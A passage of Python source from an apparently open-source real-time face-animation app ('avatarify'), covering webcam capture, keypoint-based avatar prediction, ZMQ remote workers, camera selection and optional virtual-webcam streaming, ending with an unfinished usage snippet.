fontsz=0.5, color=(255, 255, 255)): frame = frame.copy() cv2.putText(frame, f"FPS: {fps:.1f}", (x0, y0 + ystep * 0), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Model time (ms): {timing['predict']:.1f}", (x0, y0 + ystep * 1), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Preproc time (ms): {timing['preproc']:.1f}", (x0, y0 + ystep * 2), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Postproc time (ms): {timing['postproc']:.1f}", (x0, y0 + ystep * 3), 0, fontsz * IMG_SIZE / 256, color, 1) return frame def draw_landmark_text(frame, thk=2, fontsz=0.5, color=(0, 0, 255)): frame = frame.copy() cv2.putText(frame, "ALIGN FACES", (60, 20), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "THEN PRESS X", (60, 245), 0, fontsz * IMG_SIZE / 255, color, thk) return frame def draw_calib_text(frame, thk=2, fontsz=0.5, color=(0, 0, 255)): frame = frame.copy() cv2.putText(frame, "FIT FACE IN RECTANGLE", (40, 20), 0, fontsz * IMG_SIZE / 255, 
color, thk) cv2.putText(frame, "W - ZOOM IN", (60, 40), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "S - ZOOM OUT", (60, 60), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "THEN PRESS X", (60, 245), 0, fontsz * IMG_SIZE / 255, color, thk) return frame def select_camera(config): cam_config = config['cam_config'] cam_id = None if os.path.isfile(cam_config): with open(cam_config, 'r') as f: cam_config = yaml.load(f, Loader=yaml.FullLoader) cam_id = cam_config['cam_id'] else: cam_frames = cam_selector.query_cameras(config['query_n_cams']) if cam_frames: if len(cam_frames) == 1: cam_id = list(cam_frames)[0] else: cam_id = cam_selector.select_camera(cam_frames, window="CLICK ON YOUR CAMERA") log(f"Selected camera {cam_id}") with open(cam_config, 'w') as f: yaml.dump({'cam_id': cam_id}, f) else: log("No cameras are available") return cam_id if __name__ == "__main__": with open('config.yaml', 'r') as f: config = yaml.load(f, Loader=yaml.FullLoader) global display_string display_string = "" IMG_SIZE = 256 log('Loading Predictor') predictor_args = { 'config_path': opt.config, 'checkpoint_path': opt.checkpoint, 'relative': opt.relative, 'adapt_movement_scale': opt.adapt_scale, 'enc_downscale': opt.enc_downscale } if opt.is_worker: from afy import predictor_worker predictor_worker.run_worker(opt.in_port, opt.out_port) sys.exit(0) elif opt.is_client: from afy import predictor_remote try: predictor = predictor_remote.PredictorRemote( in_addr=opt.in_addr, out_addr=opt.out_addr, **predictor_args ) except ConnectionError as err: log(err) sys.exit(1) predictor.start() else: from afy import predictor_local predictor = predictor_local.PredictorLocal( **predictor_args ) cam_id = select_camera(config) if cam_id is None: exit(1) cap = VideoCaptureAsync(cam_id) cap.start() avatars, avatar_names = load_images() enable_vcam = not opt.no_stream ret, frame = cap.read() stream_img_size = frame.shape[1], frame.shape[0] if enable_vcam: if _platform in ['linux', 'linux2']: try: import pyfakewebcam except ImportError: log("pyfakewebcam is not installed.") exit(1) stream = pyfakewebcam.FakeWebcam(f'/dev/video{opt.virt_cam}', *stream_img_size) else: enable_vcam = False # log("Virtual camera is supported only on Linux.") # if not enable_vcam: # log("Virtual camera streaming will be disabled.") cur_ava = 0 avatar = None change_avatar(predictor, avatars[cur_ava]) passthrough = False cv2.namedWindow('cam', cv2.WINDOW_GUI_NORMAL) cv2.moveWindow('cam', 500, 250) frame_proportion = 0.9 frame_offset_x = 0 frame_offset_y = 0 overlay_alpha = 0.0 preview_flip = False output_flip = False find_keyframe = False is_calibrated = False show_landmarks = False fps_hist = [] fps = 0 show_fps = False print_help() try: while True: tt = TicToc() timing = { 'preproc': 0, 'predict': 0, 'postproc': 0 } green_overlay = False tt.tic() ret, frame = cap.read() if not ret: log("Can't receive frame (stream end?). 
Exiting ...") break frame = frame[..., ::-1] frame_orig = frame.copy() frame, (frame_offset_x, frame_offset_y) = crop(frame, p=frame_proportion, offset_x=frame_offset_x, offset_y=frame_offset_y) frame = resize(frame, (IMG_SIZE, IMG_SIZE))[..., :3] if find_keyframe: if is_new_frame_better(avatar, frame, predictor): log("Taking new frame!") green_overlay = True predictor.reset_frames() timing['preproc'] = tt.toc() if passthrough: out = frame elif is_calibrated: tt.tic() out = predictor.predict(frame) if out is None: log('predict returned None') timing['predict'] = tt.toc() else: out = None tt.tic() key = cv2.waitKey(1) if cv2.getWindowProperty('cam', cv2.WND_PROP_VISIBLE) < 1.0: break elif is_calibrated and cv2.getWindowProperty('avatarify', cv2.WND_PROP_VISIBLE) < 1.0: break if key == 27: # ESC break elif key == ord('d'): cur_ava += 1 if cur_ava >= len(avatars): cur_ava = 0 passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == ord('a'): cur_ava -= 1 if cur_ava < 0: cur_ava = len(avatars) - 1 passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == ord('w'): frame_proportion -= 0.05 frame_proportion = max(frame_proportion, 0.1) elif key == ord('s'): frame_proportion += 0.05 frame_proportion = min(frame_proportion, 1.0) elif key == ord('H'): frame_offset_x -= 1 elif key == ord('h'): frame_offset_x -= 5 elif key == ord('K'): frame_offset_x += 1 elif key == ord('k'): frame_offset_x += 5 elif key == ord('J'): frame_offset_y -= 1 elif key == ord('j'): frame_offset_y -= 5 elif key == ord('U'): frame_offset_y += 1 elif key == ord('u'): frame_offset_y += 5 elif key == ord('Z'): frame_offset_x = 0 frame_offset_y = 0 frame_proportion = 0.9 elif key == ord('x'): predictor.reset_frames() if not is_calibrated: cv2.namedWindow('avatarify', cv2.WINDOW_GUI_NORMAL) cv2.moveWindow('avatarify', 600, 250) is_calibrated = True show_landmarks = False elif key == ord('z'): overlay_alpha = max(overlay_alpha - 0.1, 0.0) elif key == ord('c'): overlay_alpha = min(overlay_alpha + 0.1, 1.0) elif key == ord('r'): preview_flip = not preview_flip elif key == ord('t'): output_flip = not output_flip elif key == ord('f'): find_keyframe = not find_keyframe elif key == ord('o'): show_landmarks = not show_landmarks elif key == ord('q'): try: log('Loading StyleGAN avatar...') avatar = load_stylegan_avatar() passthrough = False change_avatar(predictor, avatar) except: log('Failed to load StyleGAN avatar') elif key == ord('l'): try: log('Reloading avatars...') avatars, avatar_names = load_images() passthrough = False log("Images reloaded") except: log('Image reload failed') elif key == ord('i'): show_fps = not show_fps elif 48 < key < 58: cur_ava = min(key - 49, len(avatars) - 1) passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == 48: passthrough = not passthrough elif key != -1: log(key) if overlay_alpha > 0: preview_frame = cv2.addWeighted( avatar, overlay_alpha, frame, 1.0 - overlay_alpha, 0.0) else: preview_frame = frame.copy() if show_landmarks: # Dim the background to make it easier to see the landmarks preview_frame = cv2.convertScaleAbs(preview_frame, alpha=0.5, beta=0.0) draw_face_landmarks(preview_frame, avatar_kp, (200, 20, 10)) frame_kp = predictor.get_frame_kp(frame) draw_face_landmarks(preview_frame, frame_kp) if preview_flip: preview_frame = cv2.flip(preview_frame, 1) if green_overlay: green_alpha = 0.8 overlay = preview_frame.copy() overlay[:] = (0, 255, 0) preview_frame = cv2.addWeighted( preview_frame, green_alpha, overlay, 1.0 - green_alpha, 0.0) 
timing['postproc'] = tt.toc() if find_keyframe: preview_frame = cv2.putText(preview_frame, display_string, (10, 220), 0, 0.5 * IMG_SIZE / 256, (255, 255, 255), 1) if show_fps: preview_frame = draw_fps(preview_frame, fps, timing) if not is_calibrated: preview_frame = draw_calib_text(preview_frame) elif show_landmarks: preview_frame = draw_landmark_text(preview_frame) if not opt.hide_rect: draw_rect(preview_frame) cv2.imshow('cam', preview_frame[..., ::-1]) if out is not None: if not opt.no_pad: out = pad_img(out, stream_img_size) if output_flip: out = cv2.flip(out, 1) if enable_vcam: out = resize(out, stream_img_size) stream.schedule_frame(out) cv2.imshow('avatarify', out[..., ::-1]) fps_hist.append(tt.toc(total=True)) if len(fps_hist) == 10: fps = 10 / (sum(fps_hist) / 1000) fps_hist = [] except KeyboardInterrupt: log("main: user interrupt") log("stopping camera") cap.stop() cv2.destroyAllWindows() if opt.is_client: log("stopping remote predictor") predictor.stop() log("main: exit") File: afy/videocaptureasync.py # https://github.com/gilbertfrancois/video-capture-async import threading import cv2 import time WARMUP_TIMEOUT = 10.0 class VideoCaptureAsync: def __init__(self, src=0, width=640, height=480): self.src = src self.cap = cv2.VideoCapture(self.src) if not self.cap.isOpened(): raise RuntimeError("Cannot open camera") self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height) self.grabbed, self.frame = self.cap.read() self.started = False self.read_lock = threading.Lock() def set(self, var1, var2): self.cap.set(var1, var2) def isOpened(self): return self.cap.isOpened() def start(self): if self.started: print('[!] Asynchronous video capturing has already been started.') return None self.started = True self.thread = threading.Thread(target=self.update, args=(), daemon=True) self.thread.start() # (warmup) wait for the first successfully grabbed frame warmup_start_time = time.time() while not self.grabbed: warmup_elapsed_time = (time.time() - warmup_start_time) if warmup_elapsed_time > WARMUP_TIMEOUT: raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.") time.sleep(0.5) return self def update(self): while self.started: grabbed, frame = self.cap.read() if not grabbed or frame is None or frame.size == 0: continue with self.read_lock: self.grabbed = grabbed self.frame = frame def read(self): while True: with self.read_lock: frame = self.frame.copy() grabbed = self.grabbed break return grabbed, frame def stop(self): self.started = False self.thread.join() def __exit__(self, exec_type, exc_value, traceback): self.cap.release() File: afy/networking.py import zmq import numpy as np import msgpack import msgpack_numpy as m m.patch() from afy.utils import log def check_connection(socket, timeout=1000): old_rcvtimeo = socket.RCVTIMEO socket.RCVTIMEO = timeout try: data = msgpack.packb(([], {})) socket.send_data('hello', data) attr_recv, data_recv = socket.recv_data() response = msgpack.unpackb(data_recv) except zmq.error.Again: return False finally: socket.RCVTIMEO = old_rcvtimeo log(f"Response to hello is {response}") return response == 'OK' class SerializingSocket(zmq.Socket): """Numpy array serialization methods. Based on https://github.com/jeffbass/imagezmq/blob/master/imagezmq/imagezmq.py#L291 Used for sending / receiving OpenCV images, which are Numpy arrays. Also used for sending / receiving jpg compressed OpenCV images. 
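Each message is sent as two ZMQ frames: a JSON metadata frame (flagged with zmq.SNDMORE) followed by the raw payload bytes, and the recv_* methods read the two frames back in the same order.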
""" def send_array(self, A, msg='NoName', flags=0, copy=True, track=False): """Sends a numpy array with metadata and text message. Sends a numpy array with the metadata necessary for reconstructing the array (dtype,shape). Also sends a text msg, often the array or image name. Arguments: A: numpy array or OpenCV image. msg: (optional) array name, image name or text message. flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. """ md = dict( msg=msg, dtype=str(A.dtype), shape=A.shape, ) self.send_json(md, flags | zmq.SNDMORE) return self.send(A, flags, copy=copy, track=track) def send_data(self, msg='NoName', data=b'00', flags=0, copy=True, track=False): """Send a jpg buffer with a text message. Sends a jpg bytestring of an OpenCV image. Also sends text msg, often the image name. Arguments: msg: image name or text message. data: binary data to be sent. flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. """ md = dict(msg=msg, ) self.send_json(md, flags | zmq.SNDMORE) return self.send(data, flags, copy=copy, track=track) def recv_array(self, flags=0, copy=True, track=False): """Receives a numpy array with metadata and text message. Receives a numpy array with the metadata necessary for reconstructing the array (dtype,shape). Returns the array and a text msg, often the array or image name. Arguments: flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. Returns: msg: image name or text message. A: numpy array or OpenCV image reconstructed with dtype and shape. """ md = self.recv_json(flags=flags) msg = self.recv(flags=flags, copy=copy, track=track) A = np.frombuffer(msg, dtype=md['dtype']) return (md['msg'], A.reshape(md['shape'])) def recv_data(self, flags=0, copy=True, track=False): """Receives a jpg buffer and a text msg. Receives a jpg bytestring of an OpenCV image. Also receives a text msg, often the image name. Arguments: flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. Returns: msg: image name or text message. data: bytestring, containing data. """ md = self.recv_json(flags=flags) # metadata text data = self.recv(flags=flags, copy=copy, track=track) return (md['msg'], data) class SerializingContext(zmq.Context): _socket_class = SerializingSocket File: afy/utils.py import sys import time from collections import defaultdict import numpy as np import cv2 def log(*args, file=sys.stderr, **kwargs): time_str = f'{time.time():.6f}' print(f'[{time_str}]', *args, file=file, **kwargs) def info(*args, file=sys.stdout, **kwargs): print(*args, file=file, **kwargs) class Tee(object): def __init__(self, filename, mode='w', terminal=sys.stderr): self.file = open(filename, mode, buffering=1) self.terminal = terminal def __del__(self): self.file.close() def write(self, *args, **kwargs): log(*args, file=self.file, **kwargs) log(*args, file=self.terminal, **kwargs) def __call__(self, *args, **kwargs): return self.write(*args, **kwargs) def flush(self): self.file.flush() class Logger(): def __init__(self, filename, verbose=True): self.tee = Tee(filename) self.verbose = verbose def __call__(self, *args, important=False, **kwargs): if not self.verbose and not important: return self.tee(*args, **kwargs) class Once(): _id = {} def __init__(self, what, who=log, per=1e12): """ Do who(what) once per seconds. what: args for who who: callable per: frequency in seconds. 
""" assert callable(who) now = time.time() if what not in Once._id or now - Once._id[what] > per: who(what) Once._id[what] = now class TicToc: def __init__(self): self.t = None self.t_init = time.time() def tic(self): self.t = time.time() def toc(self, total=False): if total: return (time.time() - self.t_init) * 1000 assert self.t, 'You forgot to call tic()' return (time.time() - self.t) * 1000 def tocp(self, str): t = self.toc() log(f"{str} took {t:.4f}ms") return t class AccumDict: def __init__(self, num_f=3): self.d = defaultdict(list) self.num_f = num_f def add(self, k, v): self.d[k] += [v] def __dict__(self): return self.d def __getitem__(self, key): return self.d[key] def __str__(self): s = '' for k in self.d: if not self.d[k]: continue cur = self.d[k][-1] avg = np.mean(self.d[k]) format_str = '{:.%df}' % self.num_f cur_str = format_str.format(cur) avg_str = format_str.format(avg) s += f'{k} {cur_str} ({avg_str})\t\t' return s def __repr__(self): return self.__str__() def clamp(value, min_value, max_value): return max(min(value, max_value), min_value) def crop(img, p=0.7, offset_x=0, offset_y=0): h, w = img.shape[:2] x = int(min(w, h) * p) l = (w - x) // 2 r = w - l u = (h - x) // 2 d = h - u offset_x = clamp(offset_x, -l, w - r) offset_y = clamp(offset_y, -u, h - d) l += offset_x r += offset_x u += offset_y d += offset_y return img[u:d, l:r], (offset_x, offset_y) def pad_img(img, target_size, default_pad=0): sh, sw = img.shape[:2] w, h = target_size pad_w, pad_h = default_pad, default_pad if w / h > 1: pad_w += int(sw * (w / h) - sw) // 2 else: pad_h += int(sh * (h / w) - sh) // 2 out = np.pad(img, [[pad_h, pad_h], [pad_w, pad_w], [0,0]], 'constant') return out def resize(img, size, version='cv'): return cv2.resize(img, size) File: afy/predictor_local.py from scipy.spatial import ConvexHull import torch import yaml from modules.keypoint_detector import KPDetector from modules.generator_optim import OcclusionAwareGenerator from sync_batchnorm import DataParallelWithCallback import numpy as np import face_alignment def normalize_kp(kp_source, kp_driving, kp_driving_initial, adapt_movement_scale=False, use_relative_movement=False, use_relative_jacobian=False): if adapt_movement_scale: source_area = ConvexHull(kp_source['value'][0].data.cpu().numpy()).volume driving_area = ConvexHull(kp_driving_initial['value'][0].data.cpu().numpy()).volume adapt_movement_scale = np.sqrt(source_area) / np.sqrt(driving_area) else: adapt_movement_scale = 1 kp_new = {k: v for k, v in kp_driving.items()} if use_relative_movement: kp_value_diff = (kp_driving['value'] - kp_driving_initial['value']) kp_value_diff *= adapt_movement_scale kp_new['value'] = kp_value_diff + kp_source['value'] if use_relative_jacobian: jacobian_diff = torch.matmul(kp_driving['jacobian'], torch.inverse(kp_driving_initial['jacobian'])) kp_new['jacobian'] = torch.matmul(jacobian_diff, kp_source['jacobian']) return kp_new def to_tensor(a): return torch.tensor(a[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2) / 255 class PredictorLocal: def __init__(self, config_path, checkpoint_path, relative=False, adapt_movement_scale=False, device=None, enc_downscale=1): self.device = device or ('cuda' if torch.cuda.is_available() else 'cpu') self.relative = relative self.adapt_movement_scale = adapt_movement_scale self.start_frame = None self.start_frame_kp = None self.kp_driving_initial = None self.config_path = config_path self.checkpoint_path = checkpoint_path self.generator, self.kp_detector = self.load_checkpoints() self.fa = 
face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, flip_input=True, device=self.device) self.source = None self.kp_source = None self.enc_downscale = enc_downscale def load_checkpoints(self): with open(self.config_path) as f: config = yaml.load(f, Loader=yaml.FullLoader) generator = OcclusionAwareGenerator(**config['model_params']['generator_params'], **config['model_params']['common_params']) generator.to(self.device) kp_detector = KPDetector(**config['model_params']['kp_detector_params'], **config['model_params']['common_params']) kp_detector.to(self.device) checkpoint = torch.load(self.checkpoint_path, map_location=self.device) generator.load_state_dict(checkpoint['generator']) kp_detector.load_state_dict(checkpoint['kp_detector']) generator.eval() kp_detector.eval() return generator, kp_detector def reset_frames(self): self.kp_driving_initial = None def set_source_image(self, source_image): self.source = to_tensor(source_image).to(self.device) self.kp_source = self.kp_detector(self.source) if self.enc_downscale > 1: h, w = int(self.source.shape[2] / self.enc_downscale), int(self.source.shape[3] / self.enc_downscale) source_enc = torch.nn.functional.interpolate(self.source, size=(h, w), mode='bilinear') else: source_enc = self.source self.generator.encode_source(source_enc) def predict(self, driving_frame): assert self.kp_source is not None, "call set_source_image()" with torch.no_grad(): driving = to_tensor(driving_frame).to(self.device) if self.kp_driving_initial is None: self.kp_driving_initial = self.kp_detector(driving) self.start_frame = driving_frame.copy() self.start_frame_kp = self.get_frame_kp(driving_frame) kp_driving = self.kp_detector(driving) kp_norm = normalize_kp(kp_source=self.kp_source, kp_driving=kp_driving, kp_driving_initial=self.kp_driving_initial, use_relative_movement=self.relative, use_relative_jacobian=self.relative, adapt_movement_scale=self.adapt_movement_scale) out = self.generator(self.source, kp_source=self.kp_source, kp_driving=kp_norm) out = np.transpose(out['prediction'].data.cpu().numpy(), [0, 2, 3, 1])[0] out = (np.clip(out, 0, 1) * 255).astype(np.uint8) return out def get_frame_kp(self, image): kp_landmarks = self.fa.get_landmarks(image) if kp_landmarks: kp_image = kp_landmarks[0] kp_image = self.normalize_alignment_kp(kp_image) return kp_image else: return None @staticmethod def normalize_alignment_kp(kp): kp = kp - kp.mean(axis=0, keepdims=True) area = ConvexHull(kp[:, :2]).volume area = np.sqrt(area) kp[:, :2] = kp[:, :2] / area return kp def get_start_frame(self): return self.start_frame def get_start_frame_kp(self): return self.start_frame_kp File: afy/predictor_remote.py from arguments import opt from networking import SerializingContext, check_connection from utils import Logger, TicToc, AccumDict, Once import multiprocessing as mp import queue import cv2 import numpy as np import zmq import msgpack import msgpack_numpy as m m.patch() PUT_TIMEOUT = 0.1 # s GET_TIMEOUT = 0.1 # s RECV_TIMEOUT = 1000 # ms QUEUE_SIZE = 100 class PredictorRemote: def __init__(self, *args, in_addr=None, out_addr=None, **kwargs): self.in_addr = in_addr self.out_addr = out_addr self.predictor_args = (args, kwargs) self.timing = AccumDict() self.log = Logger('./var/log/predictor_remote.log', verbose=opt.verbose) self.send_queue = mp.Queue(QUEUE_SIZE) self.recv_queue = mp.Queue(QUEUE_SIZE) self.worker_alive = mp.Value('i', 0) self.send_process = mp.Process( target=self.send_worker, args=(self.in_addr, self.send_queue, self.worker_alive), name="send_process" 
) self.recv_process = mp.Process( target=self.recv_worker, args=(self.out_addr, self.recv_queue, self.worker_alive), name="recv_process" ) self._i_msg = -1 def start(self): self.worker_alive.value = 1 self.send_process.start() self.recv_process.start() self.init_remote_worker() def stop(self): self.worker_alive.value = 0 self.log("join worker processes...") self.send_process.join(timeout=5) self.recv_process.join(timeout=5) self.send_process.terminate() self.recv_process.terminate() def init_remote_worker(self): return self._send_recv_async('__init__', self.predictor_args, critical=True) def __getattr__(self, attr): is_critical = attr != 'predict' return lambda *args, **kwargs: self._send_recv_async(attr, (args, kwargs), critical=is_critical) def _send_recv_async(self, method, args, critical): self._i_msg += 1 args, kwargs = args tt = TicToc() tt.tic() if method == 'predict': image = args[0] assert isinstance(image, np.ndarray), 'Expected image' ret_code, data = cv2.imencode(".jpg", image, [int(cv2.IMWRITE_JPEG_QUALITY), opt.jpg_quality]) else: data = msgpack.packb((args, kwargs)) self.timing.add('PACK', tt.toc()) meta = { 'name': method, 'critical': critical, 'id': self._i_msg } self.log("send", meta) if critical: self.send_queue.put((meta, data)) while True: meta_recv, data_recv = self.recv_queue.get() if meta_recv == meta: break else: try: # TODO: find good timeout self.send_queue.put((meta, data), timeout=PUT_TIMEOUT) except queue.Full: self.log('send_queue is full') try: meta_recv, data_recv = self.recv_queue.get(timeout=GET_TIMEOUT) except queue.Empty: self.log('recv_queue is empty') return None self.log("recv", meta_recv) tt.tic() if meta_recv['name'] == 'predict': result = cv2.imdecode(np.frombuffer(data_recv, dtype='uint8'), -1) else: result = msgpack.unpackb(data_recv) self.timing.add('UNPACK', tt.toc()) if opt.verbose: Once(self.timing, per=1) return result @staticmethod def send_worker(address, send_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/send_worker.log', opt.verbose) ctx = SerializingContext() sender = ctx.socket(zmq.PUSH) sender.connect(address) log(f"Sending to {address}") try: while worker_alive.value: tt = TicToc() try: msg = send_queue.get(timeout=GET_TIMEOUT) except queue.Empty: continue tt.tic() sender.send_data(*msg) timing.add('SEND', tt.toc()) if opt.verbose: Once(timing, log, per=1) except KeyboardInterrupt: log("send_worker: user interrupt") finally: worker_alive.value = 0 sender.disconnect(address) sender.close() ctx.destroy() log("send_worker exit") @staticmethod def recv_worker(address, recv_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/recv_worker.log') ctx = SerializingContext() receiver = ctx.socket(zmq.PULL) receiver.connect(address) receiver.RCVTIMEO = RECV_TIMEOUT log(f"Receiving from {address}") try: while worker_alive.value: tt = TicToc() try: tt.tic() msg = receiver.recv_data() timing.add('RECV', tt.toc()) except zmq.error.Again: continue try: recv_queue.put(msg, timeout=PUT_TIMEOUT) except queue.Full: log('recv_queue full') continue if opt.verbose: Once(timing, log, per=1) except KeyboardInterrupt: log("recv_worker: user interrupt") finally: worker_alive.value = 0 receiver.disconnect(address) receiver.close() ctx.destroy() log("recv_worker exit") File: afy/camera_selector.py import cv2 import numpy as np import yaml from afy.utils import log g_selected_cam = None def query_cameras(n_cams): cam_frames = {} cap = None for camid in range(n_cams): log(f"Trying camera with id {camid}") cap = 
cv2.VideoCapture(camid) if not cap.isOpened(): log(f"Camera with id {camid} is not available") continue ret, frame = cap.read() if not ret or frame is None: log(f"Could not read from camera with id {camid}") cap.release() continue for i in range(10): ret, frame = cap.read() cam_frames[camid] = frame.copy() cap.release() return cam_frames def make_grid(images, cell_size=(320, 240), cols=2): w0, h0 = cell_size _rows = len(images) // cols + int(len(images) % cols) _cols = min(len(images), cols) grid = np.zeros((h0 * _rows, w0 * _cols, 3), dtype=np.uint8) for i, (camid, img) in enumerate(images.items()): img = cv2.resize(img, (w0, h0)) # add rect img = cv2.rectangle(img, (1, 1), (w0 - 1, h0 - 1), (0, 0, 255), 2) # add id img = cv2.putText(img, f'Camera {camid}', (10, 30), 0, 1, (0, 255, 0), 2) c = i % cols r = i // cols grid[r * h0:(r + 1) * h0, c * w0:(c + 1) * w0] = img[..., :3] return grid def mouse_callback(event, x, y, flags, userdata): global g_selected_cam if event == 1: cell_size, grid_cols, cam_frames = userdata c = x // cell_size[0] r = y // cell_size[1] camid = r * grid_cols + c if camid < len(cam_frames): g_selected_cam = camid def select_camera(cam_frames, window="Camera selector"): cell_size = 320, 240 grid_cols = 2 grid = make_grid(cam_frames, cols=grid_cols) # to fit the text if only one cam available if grid.shape[1] == 320: cell_size = 640, 480 grid = cv2.resize(grid, cell_size) cv2.putText(grid, f'Click on the web camera to use', (10, grid.shape[0] - 30), 0, 0.7, (200, 200, 200), 2) cv2.namedWindow(window) cv2.setMouseCallback(window, mouse_callback, (cell_size, grid_cols, cam_frames)) cv2.imshow(window, grid) while True: key = cv2.waitKey(10) if g_selected_cam is not None: break if key == 27: break cv2.destroyAllWindows() if g_selected_cam is not None: return list(cam_frames)[g_selected_cam] else: return list(cam_frames)[0] if __name__ == '__main__': with open('config.yaml', 'r') as f: config = yaml.load(f, Loader=yaml.FullLoader) cam_frames = query_cameras(config['query_n_cams']) if cam_frames: selected_cam = select_camera(cam_frames) print(f"Selected camera {selected_cam}") else: log("No cameras are available") File: afy/predictor_worker.py from predictor_local import PredictorLocal from arguments import opt from networking import SerializingContext, check_connection from utils import Logger, TicToc, AccumDict, Once import cv2 import numpy as np import zmq import msgpack import msgpack_numpy as m m.patch() import queue import multiprocessing as mp import traceback import time PUT_TIMEOUT = 1 # s GET_TIMEOUT = 1 # s RECV_TIMEOUT = 1000 # ms QUEUE_SIZE = 100 # class PredictorLocal(): # def __init__(self, *args, **kwargs): # pass # def __getattr__(self, *args, **kwargs): # return lambda *args, **kwargs: None class PredictorWorker(): def __init__(self, in_port=None, out_port=None): self.recv_queue = mp.Queue(QUEUE_SIZE) self.send_queue = mp.Queue(QUEUE_SIZE) self.worker_alive = mp.Value('i', 0) self.recv_process = mp.Process(target=self.recv_worker, args=(in_port, self.recv_queue, self.worker_alive)) self.predictor_process = mp.Process(target=self.predictor_worker, args=(self.recv_queue, self.send_queue, self.worker_alive)) self.send_process = mp.Process(target=self.send_worker, args=(out_port, self.send_queue, self.worker_alive)) def run(self): self.worker_alive.value = 1 self.recv_process.start() self.predictor_process.start() self.send_process.start() try: self.recv_process.join() self.predictor_process.join() self.send_process.join() except KeyboardInterrupt: pass 
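    # Architecture note (summarizing the three static workers below): recv_worker PULLs
    # requests from the client over ZMQ on in_port and feeds recv_queue; predictor_worker
    # pops requests, runs them through PredictorLocal, and puts the results on send_queue;
    # send_worker PUSHes results back to the client on out_port. The queues are bounded
    # (QUEUE_SIZE), so non-critical messages such as 'predict' frames may be dropped when
    # a queue is full, while critical ones (e.g. '__init__') are always delivered.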
@staticmethod def recv_worker(port, recv_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/recv_worker.log', verbose=opt.verbose) ctx = SerializingContext() socket = ctx.socket(zmq.PULL) socket.bind(f"tcp://*:{port}") socket.RCVTIMEO = RECV_TIMEOUT log(f'Receiving on port {port}', important=True) try: while worker_alive.value: tt = TicToc() try: tt.tic() msg = socket.recv_data() timing.add('RECV', tt.toc()) except zmq.error.Again: log("recv timeout") continue #log('recv', msg[0]) method, data = msg if method['critical']: recv_queue.put(msg) else: try: recv_queue.put(msg, block=False) except queue.Full: log('recv_queue full') Once(timing, log, per=1) except KeyboardInterrupt: log("recv_worker: user interrupt", important=True) worker_alive.value = 0 log("recv_worker exit", important=True) @staticmethod def predictor_worker(recv_queue, send_queue, worker_alive): predictor = None predictor_args = () timing = AccumDict() log = Logger('./var/log/predictor_worker.log', verbose=opt.verbose) try: while worker_alive.value: tt = TicToc() try: method, data = recv_queue.get(timeout=GET_TIMEOUT) except queue.Empty: continue # get the latest non-critical request from the queue # don't skip critical request while not recv_queue.empty() and not method['critical']: log(f"skip {method}") method, data = recv_queue.get() log("working on", method) try: tt.tic() if method['name'] == 'predict': image = cv2.imdecode(np.frombuffer(data, dtype='uint8'), -1) else: args = msgpack.unpackb(data) timing.add('UNPACK', tt.toc()) except ValueError: log("Invalid Message", important=True) continue tt.tic() if method['name'] == "hello": result = "OK" elif method['name'] == "__init__": if args == predictor_args: log("Same config as before... reusing previous predictor") else: del predictor predictor_args = args predictor = PredictorLocal(*predictor_args[0], **predictor_args[1]) log("Initialized predictor with:", predictor_args, important=True) result = True tt.tic() # don't account for init elif method['name'] == 'predict': assert predictor is not None, "Predictor was not initialized" result = getattr(predictor, method['name'])(image) else: assert predictor is not None, "Predictor was not initialized" result = getattr(predictor, method['name'])(*args[0], **args[1]) timing.add('CALL', tt.toc()) tt.tic() if method['name'] == 'predict': assert isinstance(result, np.ndarray), f'Expected np.ndarray, got {result.__class__}' ret_code, data_send = cv2.imencode(".jpg", result, [int(cv2.IMWRITE_JPEG_QUALITY), opt.jpg_quality]) else: data_send = msgpack.packb(result) timing.add('PACK', tt.toc()) if method['critical']: send_queue.put((method, data_send)) else: try: send_queue.put((method, data_send), block=False) except queue.Full: log("send_queue full") pass Once(timing, log, per=1) except KeyboardInterrupt: log("predictor_worker: user interrupt", important=True) except Exception as e: log("predictor_worker error", important=True) traceback.print_exc() worker_alive.value = 0 log("predictor_worker exit", important=True) @staticmethod def send_worker(port, send_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/send_worker.log', verbose=opt.verbose) ctx = SerializingContext() socket = ctx.socket(zmq.PUSH) socket.bind(f"tcp://*:{port}") log(f'Sending on port {port}', important=True) try: while worker_alive.value: tt = TicToc() try: method, data = send_queue.get(timeout=GET_TIMEOUT) except queue.Empty: log("send queue empty") continue # get the latest non-critical request from the queue # don't skip critical 
request while not send_queue.empty() and not method['critical']: log(f"skip {method}") method, data = send_queue.get() log("sending", method) tt.tic() socket.send_data(method, data) timing.add('SEND', tt.toc()) Once(timing, log, per=1) except KeyboardInterrupt: log("predictor_worker: user interrupt", important=True) worker_alive.value = 0 log("send_worker exit", important=True) def run_worker(in_port=None, out_port=None): worker = PredictorWorker(in_port=in_port, out_port=out_port) worker.run()
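Taken together, the modules above expose a small local API: construct a `PredictorLocal`, register one avatar image with `set_source_image`, then call `predict` on each 256x256 RGB driving frame. The snippet below is a minimal offline sketch of that flow, not part of the repository: the config, checkpoint, and image paths are placeholders for whatever your install actually uses, the `load_rgb_256` helper is illustrative, and it assumes the first-order-model code (`modules`, `sync_batchnorm`) is importable, as it is after a normal install.

```python
# Minimal offline sketch (not part of the repo): animate one avatar image with one
# driving frame via PredictorLocal. Paths below are assumptions -- substitute your own.
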